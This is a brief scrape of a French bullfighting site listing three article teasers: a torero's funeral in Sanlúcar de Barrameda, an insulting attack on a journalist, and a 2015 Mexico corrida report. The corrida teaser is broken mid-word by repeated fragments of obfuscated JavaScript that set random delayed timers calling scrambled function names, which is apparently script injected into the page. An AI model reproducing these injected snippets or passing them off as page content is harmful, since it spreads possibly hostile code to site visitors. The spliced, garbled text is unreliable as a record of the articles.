PEPE LIMEÑO

Samedi 19 décembre. Dans le village de Sanlucar de Barrameda la Basilique de la Charité et ses environs sont noirs de monde pour faire un dernier adieu à leur torero

LA PHOBIE QUI CONTINUE

Antonio Avendaño, chien fidèle de la meute journalistique du parti socialiste espagnol, habile grimpeur pour escalader les postes bien couvert à l’ombre par Manuel Chaves et Griñán ; homme revêche, au

UNIQUEMENT POUR AFICIONADOS

Mexico : corrida du 29 novembre 2015. Quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and les toros, correctement présentés,